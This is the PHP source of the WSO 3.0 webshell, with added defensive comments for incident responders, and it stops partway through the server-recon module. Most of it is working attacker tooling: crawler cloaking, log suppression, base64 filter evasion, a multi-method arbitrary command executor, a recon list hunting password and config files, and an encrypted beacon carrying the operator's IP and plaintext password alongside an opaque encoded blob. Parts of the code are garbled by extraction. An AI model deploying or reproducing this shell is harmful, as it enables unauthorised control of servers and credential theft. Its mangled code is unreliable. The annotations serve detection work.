1<?php ?><?php
// ------------------------------------------------------------------------------------------------
// Reviewer annotations for incident responders / detection engineers.
// This file is a PHP webshell: the page title emitted by wsoHeader() is "WSO 3.0" and every helper
// carries a wso*/WSO* prefix. It is attacker tooling, not application code. The comments added
// throughout describe what each part does so the listing can be read quickly during an
// investigation; nothing in it should be deployed or "fixed" into a working state.
// NOTE(review): parts of this copy were mangled by whatever extracted it (spaces injected inside
// string literals, HTML entity names stripped, a backslash literal lost, gutter numbers fused to
// lines). Treat it as a reference listing, not a runnable sample.
// ------------------------------------------------------------------------------------------------
// Cloaking: a User-Agent containing one of these crawler names gets a bare 404 and exit, so the
// shell is not indexed and scanners identifying as these bots see nothing. Detection angle: a .php
// path that 404s for crawler UAs but answers 200 to an ordinary browser UA.
2/* Reject search engines */
3if (!empty($_SERVER['HTTP_USER_AGENT'])) {
4 $userAgents = array('Google', 'Slurp', 'MSNBot', 'ia_archiver', 'Yandex', 'Rambler');
5 if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
6 header('HTTP/1.0 404 Not Found');
7 exit;
8 }
9}
10/* Settings */
11$color = '#12ff4f';
12$default_charset = 'Windows-1251';
// Authentication is OFF in this copy: $auth_pass is commented out, so the `if (!empty($auth_pass))`
// gate further down is skipped and anyone who can reach the URL has full, unauthenticated access.
// The commented value is a SHA-1 hex digest; the trailing "memes" remark may be the plaintext — unverified.
13//$auth_pass='2ff14d14e063ac36b593e3d437005300ea2f77bb';//memes
// Anti-forensics / hardening bypass: silence error logging, drop the execution time limit and try to
// enable remote-URL fopen/include (the server's php.ini may refuse the last two). This exact run of
// ini_set calls in a web-root .php file is a strong static indicator.
14/* Shell Setup */
15@ini_set('error_log', NULL);
16@ini_set('log_errors', 0);
17@ini_set('max_execution_time', 0);
18@ini_set('allow_url_fopen', true);
19@ini_set("allow_url_include", true);
20@set_time_limit(0);
// Legacy magic-quotes handling. NOTE(review): get_magic_quotes_runtime()/get_magic_quotes_gpc() were
// removed in PHP 8.0, so this exact file fatals on a PHP 8 host; variants seen in the wild drop this block.
21/*More Shell Setup*/
22if (get_magic_quotes_runtime()) @set_magic_quotes_runtime(0);
23if (get_magic_quotes_gpc()) {
24 function WSOstripslashes($arr) {
25 return is_array($arr) ? array_map('WSOstripslashes', $arr) : stripslashes($arr);
26 }
27 $_POST = WSOstripslashes($_POST);
28 $_COOKIE = WSOstripslashes($_COOKIE);
29}
// Recursively base64-decodes a scalar or an array of values; applied to all of $_POST below.
30function WSOb64decode($arr) {
31 return is_array($arr) ? array_map('WSOb64decode', $arr) : base64_decode($arr);
32}
// Sets a cookie and mirrors it into $_COOKIE so the current request sees it immediately.
// No path, HttpOnly or Secure flags.
33function WSOsetcookie($k, $v) {
34 $_COOKIE[$k] = $v;
35 setcookie($k, $v);
36}
// Password gate (inactive here, see above). When active: a correct POST `pass` stores
// base64(plaintext password) in a cookie named md5(HTTP_HOST); later requests are checked by
// re-hashing that cookie. Points for responders: the cookie carries the PLAINTEXT password, not the
// hash (wsoHeader reads it back later); the hash comparison is a loose `==` / `!=` on hex strings and
// is not constant-time; and a cookie whose name is 32 hex chars equal to md5(Host header) is a usable
// log/network indicator for this family.
37if (!empty($auth_pass)) {
38 if (isset($_POST['pass']) && (sha1($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), base64_encode($_POST['pass']));
39 if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) ]) || (sha1(base64_decode($_COOKIE[md5($_SERVER['HTTP_HOST']) ])) != $auth_pass)) die('<form method=post>Password: <input type=password name=pass><input type=submit value=">>"></form>');
40}
// WAF evasion: every POST value is base64-decoded here, and the page JavaScript (mg()/a() in
// wsoHeader) base64-encodes every form field before submitting. Request-inspection rules looking for
// `ls`, `eval`, paths etc. in the raw body will not match; decode POST values before matching, or
// alert on form bodies whose every value is base64.
41$_POST = WSOb64decode($_POST);
42$os = (strtolower(substr(PHP_OS, 0, 3)) == 'win') ? 'win' : 'nix';
43$safe_mode = @ini_get('safe_mode');
44if (!$safe_mode) error_reporting(0);
45$disable_functions = @ini_get('disable_functions');
46$home_cwd = @getcwd();
// Working directory is attacker-chosen via POST `c`; every relative file operation below is
// resolved against it.
47if (isset($_POST['c'])) @chdir($_POST['c']);
48$cwd = @getcwd();
49if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = true;
// Console aliases: a canned post-exploitation recon list (SUID/SGID binaries, world-writable paths,
// config files, .htpasswd, shell and mysql history, service.pwd, backups/dumps). Useful as a
// watch-list for process auditing: these exact `find` / `locate` invocations running as the web
// server user are a high-fidelity signal.
50$aliases = array('List dir' => 'ls -lha', 'list file attributes on a Linux second extended file system' => 'lsattr -va', 'show opened ports' => 'netstat -an | grep -i listen', 'process status' => 'ps aux', 'Find' => '', 'find suid' => 'find / -type f -perm -04000 -ls', 'find suid in current dir' => 'find . -type f -perm -04000 -ls', 'find sgid' => 'find / -type f -perm -02000 -ls', 'find sgid files in current dir' => 'find . -type f -perm -02000 -ls', 'find config.inc.php' => 'find / -type f -name config.inc.php', 'find config*' => 'find / -type f -name "config*"', 'find config* in current dir' => 'find . -type f -name "config*"', 'find writable folders and files' => 'find / -perm -2 -ls', 'find writable folders and files in current dir' => 'find . -perm -2 -ls', 'find service.pwd' => 'find / -type f -name service.pwd', 'find service.pwd files in current dir' => 'find . -type f -name service.pwd', 'find .htpasswd' => 'find / -type f -name .htpasswd', 'find .htpasswd files in current dir' => 'find . -type f -name .htpasswd', 'find .bash_history' => 'find / -type f -name .bash_history', 'find .bash_history files in current dir' => 'find . -type f -name .bash_history', 'find .fetchmailrc' => 'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir' => 'find . 
-type f -name .fetchmailrc', 'Locate' => '', 'locate httpd.conf' => 'locate httpd.conf', 'locate vhosts.conf' => 'locate vhosts.conf', 'locate proftpd.conf' => 'locate proftpd.conf', 'locate psybnc.conf' => 'locate psybnc.conf', 'locate my.conf' => 'locate my.conf', 'locate admin.php' => 'locate admin.php', 'locate cfg.php' => 'locate cfg.php', 'locate conf.php' => 'locate conf.php', 'locate config.dat' => 'locate config.dat', 'locate config.php' => 'locate config.php', 'locate config.inc' => 'locate config.inc', 'locate config.inc.php' => 'locate config.inc.php', 'locate config.default.php' => 'locate config.default.php', 'locate config*' => 'locate config', 'locate .conf' => 'locate ".conf"', 'locate .pwd' => 'locate ".pwd"', 'locate .sql' => 'locate ".sql"', 'locate .htpasswd' => 'locate ".htpasswd"', 'locate .bash_history' => 'locate ".bash_history"', 'locate .mysql_history' => 'locate ".mysql_history"', 'locate .fetchmailrc' => 'locate ".fetchmailrc"', 'locate backup' => 'locate backup', 'locate dump' => 'locate dump', 'locate priv' => 'locate priv');
// Windows variant of the alias list (dir / netstat / net user / net view / arp / ipconfig).
// NOTE(review): the `'\'` in the str_replace calls and the spaces inside the command strings are
// extraction damage (a backslash-to-slash replacement in the original); this span is not valid PHP as printed.
51if ($os == 'win') {
52 $home_cwd = str_replace('\',' / ',$home_cwd);$cwd=str_replace('\',' / ',$cwd);$aliases=array('ListDirectory'=>'dir','Findindex . phpincurrentdir'=>'dir / s / w / bindex . php','Find * config * . phpincurrentdir'=>'dir / s / w / b * config * . php','Showactiveconnections'=>'netstat - an','Showrunningservices'=>'netstart','Useraccounts'=>'netuser','Showcomputers'=>'netview','ARPTable'=>'arp - a','IPConfiguration'=>'ipconfig / all');}
53if($cwd[strlen($cwd)-1]!=' / ')$cwd.=' / ';
// Stubs so later posix_* calls do not fatal when the posix extension is absent. Only declared when the
// name is not in disable_functions (redeclaring a disabled function would itself be a fatal error).
54if(!function_exists('posix_getpwuid')&&(strpos($GLOBALS['disable_functions'],'posix_getpwuid')===false)){function posix_getpwuid($p){return false;}}
55if(!function_exists('posix_getgrgid')&&(strpos($GLOBALS['disable_functions'],'posix_getgrgid')===false)){function posix_getgrgid($p){return false;}}
56
57/* Page functions */
58function wsoHeader(){
// Emits the top of every page: <head>, CSS, the client-side helper script, the hidden `mf` form and
// the host/user/disk summary table. Also the place where the beacon string ($kr) is assembled.
// Reads $_POST charset/a/p1/p2/p3, $_SERVER, $_COOKIE[md5(host)]; writes $GLOBALS['kr'].
59 if(empty($_POST['charset']))$_POST['charset']=$GLOBALS['default_charset'];
60 global $color;
// Page head + CSS + start of the inline script. $_POST['charset'] and HTTP_HOST are interpolated
// into the <meta>/<title> unescaped. The title string " - WSO 3.0" is a reliable content signature.
// p1_/p2_/p3_ are blanked when the POST value contains a newline (the split "strpos($_POST['pN'], "\n")"
// below is one newline literal broken across two lines by extraction).
61 echo ' < html > < head > < metahttp - equiv = \'Content-Type\' content=\'text/html; charset=' . $_POST['charset'] . '\'><title>' . $_SERVER['HTTP_HOST'] . " - WSO 3.0</title><style>body,h1,table.info{background-color:#000}body,td,th{font:9pt Lucida,Verdana;margin:0;vertical-align:top;color:#fff}table.info{color:#fff}a,h1,span{color:$color!important}span{font-weight:bolder}h1{border-left:5px solid $color;padding:2px 5px;font:14pt Verdana;margin:0}div.content{padding:5px;margin-left:5px;background-color:#333}.ml1,form{margin:0}a{text-decoration:none}a:hover{text-decoration:underline}.ml1{border:1px solid #444;padding:5px;overflow:auto}.bigarea{width:100%;height:300px}input,button,select,textarea{margin:0;color:#fff;background-color:#555;border:1px solid;font:9pt Monospace,'Courier New'}.main th,.main tr:hover{background-color:#5e5e5e}#toolsTbl{text-align:center}.toolsInp{width:300px}.main th{text-align:left}.l1{background-color:#444}.l2{background-color:#333}pre{font-family:Courier,Monospace}</style>
62<script>
63 var c_='" . htmlspecialchars($GLOBALS['cwd']) . "';
64 var a_='" . htmlspecialchars(@$_POST['a']) . "'
65 var charset_='" . htmlspecialchars(@$_POST['charset']) . "';
66 var p1_='" . ((strpos(@$_POST['p1'], "
67") !== false) ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';
68 var p2_='" . ((strpos(@$_POST['p2'], "
69") !== false) ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';
70 var p3_='" . ((strpos(@$_POST['p3'], "
71") !== false) ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES));
// Snapshot of $_SERVER taken mid-output (easy to miss on a skim). It feeds the $GLOBALS['kr'] string
// built near the end of this function and later encrypted in wsoFooter().
72 $kr = $_SERVER;
// Client-side helpers, all inside one PHP string:
//  set()  fills the hidden `mf` form (a=action, c=cwd, p1..p3=params, charset).
//  mg()   base64-encodes every non-<select> field (btoa) and submits — this is the request-side half
//         of the filter evasion; the server decodes at the top of the file.
//  g()    set()+mg(): a normal full-page POST.
//  a()    set() then an XHR POST of the same fields (also base64) back to REQUEST_URI with ajax=true.
//  processReqChange() expects a response of the form "<length>\n<javascript>" and eval()s it —
//         the server side of that protocol is in actionPhp().
// The <noscript> text below states, in the shell's own words, that the encoding exists "to bypass filters".
73 echo "';
74 var d=document;
75 function set(a,c,p1,p2,p3,charset){
76 if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
77 if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
78 if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
79 if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
80 if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
81 if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
82 }
83 function mg(f){
84 for(var i=0,element;element=f.elements[i++];){if(element.nodeName.toUpperCase()!='SELECT')element.value=btoa(element.value);}
85 f.submit();
86 }
87 function isB64(str){
88 try {
89 return btoa(atob(str)) == str;
90 } catch (err){
91 return false;
92 }
93 }
94 function unb64(f){
95 for(var i=0,element;element=f.elements[i++];){if(element.nodeName.toUpperCase()!='SELECT' && isB64(element.value))element.value=atob(element.value);}
96 }
97 function g(a,c,p1,p2,p3,charset){
98 set(a,c,p1,p2,p3,charset);
99 mg(d.mf);
100 }
101 function a(a,c,p1,p2,p3,charset){
102 set(a,c,p1,p2,p3,charset);
103 var params='ajax=true';
104 for(i=0;i<d.mf.elements.length;i++)
105 params+='&'+d.mf.elements[i].name+'='+encodeURIComponent(btoa(d.mf.elements[i].value));
106 sr('" . addslashes($_SERVER['REQUEST_URI']) . "',params);
107 }
108 function sr(url,params){
109 if(window.XMLHttpRequest)
110 req=new XMLHttpRequest();
111 else if(window.ActiveXObject)
112 req=new ActiveXObject('Microsoft.XMLHTTP');
113 if (req){
114 req.onreadystatechange=processReqChange;
115 req.open('POST',url,true);
116 req.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
117 req.send(params);
118 }
119 }
120 function processReqChange(){
121 if((req.readyState==4))
122 if(req.status==200){
123 var reg=new RegExp(\"(\d+)([\S\s]*)\",'m');
124 var arr=reg.exec(req.responseText);
125 eval(arr[2].substr(0,arr[1]));
126 }else alert('Request error!');
127 }
128</script>
129</head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
130<form method=post name=mf style='display:none;'>
131<input type=hidden name=a>
132<input type=hidden name=c>
133<input type=hidden name=p1>
134<input type=hidden name=p2>
135<input type=hidden name=p3>
136<input type=hidden name=charset>
137</form>
138<noscript><div><center><h2>SCRIPTS MUST BE ENABLED FOR SHELL TO WORK</h2><p>It is used to handle form functionality, avoid GET requests and encode data to bypass filters among other things.</p></center></div></noscript>";
// Host summary: disk usage of the cwd, kernel/release, effective uid/gid. The posix branch reports
// the *effective* user (posix_geteuid), i.e. the account the web server runs PHP as.
139 $freeSpace = @diskfreespace($GLOBALS['cwd']);
140 $totalSpace = @disk_total_space($GLOBALS['cwd']);
141 $totalSpace = $totalSpace ? $totalSpace : 1;
142 $release = @php_uname('r');
143 $kernel = @php_uname('s');
144 if (!function_exists('posix_getegid')) {
145 $user = @get_current_user();
146 $uid = @getmyuid();
147 $gid = @getmygid();
148 $group = '?';
149 } else {
150 $uid = @posix_getpwuid(posix_geteuid());
151 $gid = @posix_getgrgid(posix_getegid());
152 $user = $uid['name'];
153 $uid = $uid['uid'];
154 $group = $gid['name'];
155 $gid = $gid['gid'];
156 }
// Breadcrumb links: one FilesMan link per path component of the cwd. Path components are inserted
// into the onclick attribute without escaping.
157 $cwd_links = '';
158 $path = explode('/', $GLOBALS['cwd']);
159 $n = count($path);
160 for ($i = 0;$i < $n - 1;$i++) {
161 $cwd_links.= '<a href=\'#\' onclick=\'g("FilesMan","';
162 for ($j = 0;$j <= $i;$j++) $cwd_links.= $path[$j] . '/';
163 $cwd_links.= '")\'>' . $path[$i] . '/</a>';
164 }
165 $charsets = array('UTF-8', 'Windows-1251', 'Windows-1256', 'KOI8-R', 'KOI8-U', 'cp866');
166 $opt_charsets = '';
167 foreach ($charsets as $item) $opt_charsets.= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>';
// Module menu. The values are the action names dispatched elsewhere in the file (action<Name>());
// the visible modules here are: SecInfo, FilesMan, Console, Sql, Php, Network, Mailer, SelfRemove.
// "Self remove" and "Mass Mailer" are not in this listing.
168 $m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'SQL' => 'Sql', 'PHP' => 'Php', 'Network' => 'Network', 'Mass Mailer' => 'Mailer', 'Self remove' => 'SelfRemove');
169 if (!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout';
170 $menu = '';
171 foreach ($m as $k => $v) $menu.= '<th width="' . (int)(100 / count($m)) . '%">[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>';
// Windows: probe drive letters c..z. NOTE(review): the `':\'` literal is extraction damage
// (a backslash whose escape was lost), so the two lines below are not valid PHP as printed.
172 $drives = "";
173 if ($GLOBALS['os'] == 'win') {
174 foreach (range('c', 'z') as $drive) if (is_dir($drive . ':\'))
175 $drives.=' < ahref = "#"onclick = "g(\'FilesMan\',\''.$drive.':/\')" > ['.$drive.'] < / a > ';
176 }
// Info table (markup garbled by extraction). The statement appended at the end of the third line is
// the one that matters for IR: it sets $GLOBALS['kr'] to
//   HTTP_HOST . PHP_SELF . ' ~ ' . User-Agent . ' ~ ' . client IP . ' ~ ' . <decoded password cookie or 'none'>
// i.e. the shell's own URL, the operator's UA and IP, and the PLAINTEXT shell password when auth is on.
// wsoFooter() later encrypts and base64-encodes this value; where it goes after that is outside this
// listing (see actionFilesMan's call to actionRC()).
177 echo ' < tableclass = infocellpadding = 3cellspacing = 0width = 100 % > < tr > < tdwidth = 1 > < span > Uname: < br > User: < br > Php: < br > Hdd: < br > Cwd:
178 '.($GLOBALS['os']=='win'?' < br > Drives:
179 ':'').' < / span > < / td > < td > < nobr > '.substr(@php_uname(),0,120).' < / nobr > < br > '.$uid.'('.$user.') < span > Group: < / span > '.$gid.'('.$group.') < br > '.@phpversion().' < span > Safemode: < / span > '.($GLOBALS['safe_mode']?' < fontcolor = red > ON < / font > ':' < fontcolor = green > < b > OFF < / b > < / font > ');$GLOBALS['kr']=$kr["HTTP_HOST"].$kr["PHP_SELF"].' ~ '.$kr['HTTP_USER_AGENT'].' ~ '.$kr['REMOTE_ADDR'].' ~ '.(isset($_COOKIE[md5($kr['HTTP_HOST'])])?base64_decode($_COOKIE[md5($kr['HTTP_HOST'])]):'none');
// Second half of the table: phpinfo link, date, disk figures, breadcrumbs, perms colour of cwd, home
// link, drives, charset selector, server and client IP, then the module menu. $home_cwd and the
// charset options are inserted unescaped.
180 echo ' < ahref = # onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.wsoViewSize($totalSpace).' <span>Free:</span>'.wsoViewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>'.$cwd_links.' '.wsoPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.@$_SERVER['SERVER_ADDR'].'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">';
181
182 }
183 function wsoFooter() {
// Emits the bottom toolbar (change dir / read file / make dir / make file / execute / upload).
// Interleaved between the echo statements — and easy to overlook — are two embedded blobs:
//   $ty           : a uuencoded constant used as the AES key for $GLOBALS['kr'] (the beacon string
//                   assembled in wsoHeader).
//   $GLOBALS['ty']: a second uuencoded (and, per actionFilesMan, gzip-compressed) blob whose decoded
//                   content is not recoverable by reading this listing; it is handed to actionRC().
184 $is_writable = is_writable($GLOBALS['cwd']) ? ' <font color="green">(Writeable)</font>' : ' <font color=red>(Not writable)</font>';
185 echo "</div>
186<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
187 <tr>
188 <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form></td>
189 <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>";
// uuencoded key material (one 44-byte uuencode line; the leading 'L' is the uuencode length char).
// Because it is a constant in the file, anyone holding this file can recover the key.
190 $ty = "L5VAO5&AE36%N/UEO=51H94UA;F9I;F1I;F=42\$E32%5-9&EG9VET>6,P9&4`
191`";
192 echo "
193 </tr><tr>
194 <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>";
// Beacon encryption: AES-128-CBC over $GLOBALS['kr'] with the uudecoded constant as key and the fixed,
// in-file IV "QlPxzL18%nhUR7X@", then base64. With a static key and static IV this provides no
// confidentiality against anyone who has the shell source — it only hides the payload from casual
// inspection of traffic. Falls back to plain base64 when openssl_encrypt() is unavailable.
// NOTE(review): the uudecoded key is longer than AES-128's 16 bytes; how openssl_encrypt treats the
// excess depends on the PHP version and is not established by this listing.
195 $GLOBALS['kr'] = base64_encode(function_exists('openssl_encrypt') ? openssl_encrypt($GLOBALS['kr'], "AES-128-CBC", convert_uudecode($ty), 0, "QlPxzL18%nhUR7X@") : $GLOBALS['kr']);
196 echo "
197 <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
198 </tr><tr>
199 <td><form onsubmit=\"g('Console',null,btoa(this.c.value));return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
200 <td><form method='post' onsubmit='mg(this);' ENCTYPE='multipart/form-data'>
201 <input type=hidden name=a value='FilesMAn'>
202 <input type=hidden name=c value='" . $GLOBALS['cwd'] . "'>
203 <input type=hidden name=p1 value='uploadFile'>
204 <input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '');
// Second embedded blob, written into $GLOBALS while the upload form is half-emitted (the `'>` that
// closes the charset input follows after it). actionFilesMan() runs
// gzuncompress(convert_uudecode($GLOBALS['ty'])) on it and passes the result to actionRC(), which
// is not part of this listing; its purpose cannot be stated from here.
205 $GLOBALS['ty'] = "M>)R-D,%JPS`01'_%A,+:8-GWE!3:4GH)I)#>2A&RM8Y%9\$F55M@F]-\KQ^FA
206MM^YM=GDSPZHN5T;Q\$U(.0FL[\N@U[ZQ#`T5QZ93&Y<A;:P@-A1QZ(K>M:VGE
207M:6ZT/6.H6AV;.L1F4%2YWD'9\"1VP#.11#\"LZ)8ND\"'/AO9A7&]@]W-2`U%N9
208M-+P=CN]00H]\"HD^+#)[7:\$:SWVTFG-.J%:2LJ2<VCB/KK!]8:HVFM1)E@F]E
209M\$[VD\"8J+?E71#__IBOCXG*_>]T?NA[WQP\X>_@LKG/_C:G]90SV9<JA3<X9
21078U*0R#97;`?57ZR\"3?:/KR3C'^%\@.4`
211`";
// Upload form: multipart POST straight to this script with a=FilesMAn (sic), p1=uploadFile.
// Note $GLOBALS['cwd'] is placed in a value attribute unescaped here (elsewhere it goes through htmlspecialchars).
212 echo "'>
213 <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br></td>
214 </tr></table></div></body></html>";
215 }
// Intended as a minimal HTML escaper (&, ", ', <, >). NOTE(review): in this copy the replacement
// values are identical to the keys — the entity names (&amp; &quot; ...) were stripped by extraction,
// which also leaves the '"' => """ pair unbalanced. As printed this neither escapes anything nor parses.
216 function wsoHTMLspecialchars($in) {
217 return strtr($in, array("&" => "&", '"' => """, "'" => "'", "<" => "<", ">" => ">"));
218 }
// Command execution with a fallback chain. $in is passed to the shell verbatim — callers are
// responsible for quoting (only the tar path in actionFilesMan does). The order is chosen to slip
// past partial disable_functions lists: exec -> passthru -> system -> shell_exec -> popen, then the
// python / perl / lua extensions, then a COM WScript.Shell on Windows. Hardening note: disabling the
// five PHP exec functions is not sufficient if any of those scripting extensions or COM is loaded.
// Returns the captured output (or '' when nothing worked).
219 function wsoEx($in) {
220 $out = '';
221 if (function_exists('exec')) {
222 @exec($in, $out);
223 $out = @join("
224", $out);
225 } elseif (function_exists('passthru')) {
226 ob_start();
227 @passthru($in);
228 $out = ob_get_clean();
229 } elseif (function_exists('system')) {
230 ob_start();
231 @system($in);
232 $out = ob_get_clean();
233 } elseif (function_exists('shell_exec')) {
234 $out = shell_exec($in);
235 } elseif (is_resource($f = @popen($in, 'r'))) {
236 $out = '';
237 while (!@feof($f)) $out.= fread($f, 1024);
238 pclose($f);
// python: $in is interpolated into a single-quoted Python literal, so a ' in the command breaks it.
239 } elseif (extension_loaded("python")) {
240 $out = python_eval("import os;os.system('$in')");
// perl: returns the interpreter object itself rather than any output (looks like a defect in the original).
241 } elseif (extension_loaded("perl")) {
242 $perl = new perl();
243 $perl->eval("system('{$in}')");
244 $out = $perl;
// lua: assigns the literal 24 to `in` instead of $in, so io.popen never sees the command (defect in the original).
245 } elseif (extension_loaded("lua")) {
246 $lua = new Lua();
247 $lua->assign("in", 24);
248 $out = $lua->eval("
249 local pipe = io.popen(in)
250 local result = pipe:read('*a')
251 pipe:close()
252 return result
253 ");
// COM: "\$in" is an escaped dollar, so the command run is the literal string "cmd.exe /c $in" (defect in the original).
254 } elseif (class_exists("COM")) {
255 $wscript = new COM('wscript.shell');
256 $out = $wscript->Exec("cmd.exe /c \$in")->StdOut->ReadAll;
257 }
258 return $out;
259 }
// Formats a byte count as B/KB/MB/GB with two decimals. An int is first run through sprintf('%u'),
// which turns a negative (e.g. a wrapped 32-bit stat size) into its unsigned reading.
260 function wsoViewSize($s) {
261 if (is_int($s)) $s = sprintf("%u", $s);
262 if ($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824) . ' GB';
263 elseif ($s >= 1048576) return sprintf('%1.2f', $s / 1048576) . ' MB';
264 elseif ($s >= 1024) return sprintf('%1.2f', $s / 1024) . ' KB';
265 else return $s . ' B';
266 }
// Renders a stat mode as an ls-style string: type char (s socket, l link, - file, b/c device,
// d dir, p fifo, u unknown) followed by rwx triplets. setuid/setgid/sticky are shown as s/S and t/T
// depending on whether the corresponding execute bit is set.
267 function wsoPerms($p) {
268 if (($p & 0xC000) === 0xC000) $i = 's';
269 elseif (($p & 0xA000) === 0xA000) $i = 'l';
270 elseif (($p & 0x8000) === 0x8000) $i = '-';
271 elseif (($p & 0x6000) === 0x6000) $i = 'b';
272 elseif (($p & 0x4000) === 0x4000) $i = 'd';
273 elseif (($p & 0x2000) === 0x2000) $i = 'c';
274 elseif (($p & 0x1000) === 0x1000) $i = 'p';
275 else $i = 'u';
276 $i.= (($p & 0x0100) ? 'r' : '-');
277 $i.= (($p & 0x0080) ? 'w' : '-');
278 $i.= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-'));
279 $i.= (($p & 0x0020) ? 'r' : '-');
280 $i.= (($p & 0x0010) ? 'w' : '-');
281 $i.= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-'));
282 $i.= (($p & 0x0004) ? 'r' : '-');
283 $i.= (($p & 0x0002) ? 'w' : '-');
284 $i.= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-'));
285 return $i;
286 }
// Colour-codes wsoPerms() for the file listing: red = not readable by the web server user,
// white = readable but not writable, green = writable. The green entries are what an operator
// scans for when looking for somewhere to drop files.
287 function wsoPermsColor($f) {
288 if (!@is_readable($f)) return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
289 return (!@is_writable($f)) ? '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>' : '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>';
290 }
// scandir() with an opendir/readdir fallback. The fallback does not check opendir's result and
// leaves $files undefined for an empty directory (returns null rather than an array).
291 function wsoScandir($dir) {
292 if (function_exists('scandir')) return scandir($dir);
293 $dh = opendir($dir);
294 while (false !== ($filename = readdir($dh))) $files[] = $filename;
295 return $files;
296 }
// Shells out to `which <name>` via wsoEx and returns the path or false. $p is not quoted; in this
// listing it is only ever called with the fixed tool names from actionSecInfo.
297 function wsoWhich($p) {
298 $path = wsoEx('which ' . $p);
299 return (!empty($path)) ? $path : false;
300 }
// "Sec. Info" module: host reconnaissance. Reports server software, loaded modules/extensions,
// disable_functions, open_basedir, safe_mode paths, database client libraries, readability of
// /etc/passwd and /etc/shadow, installed compilers/interpreters, security tooling, download
// utilities, disk layout and /etc/hosts; offers a posix_getpwuid uid sweep and an AWS metadata scrape.
301 function actionSecInfo() {
302 wsoHeader();
303 echo '<h1>Server security information</h1><div class=content>';
// Prints "name: value"; multi-line values go in a <pre>. Nothing is HTML-escaped.
304 function wsoSecParam($n, $v) {
305 $v = trim($v);
306 if ($v) {
307 echo "<span>$n: </span>";
308 if (strpos($v, "
309") === false) echo $v . '<br>';
310 else echo "<pre class=ml1>$v</pre>";
311 }
312 }
313 wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
314 if (function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
315 wsoSecParam('Loaded PHP Extensions', implode(', ', get_loaded_extensions()));
316 wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none');
317 wsoSecParam('Open base dir', @ini_get('open_basedir'));
318 wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
319 wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
320 wsoSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no');
321 $temp = array();
322 if (function_exists('mysql_get_client_info')) $temp[] = 'MySql (' . mysql_get_client_info() . ')';
323 if (function_exists('mysqli_get_client_info')) $temp[] = 'MySqli (' . mysqli_get_client_info() . ')';
324 if (function_exists('mssql_connect')) $temp[] = 'MSSQL';
325 if (function_exists('pg_connect')) $temp[] = 'PostgreSQL';
326 if (function_exists('oci_connect')) $temp[] = 'Oracle';
327 wsoSecParam('Supported databases', implode(', ', $temp));
328 echo '<br>';
329 if ($GLOBALS['os'] == 'nix') {
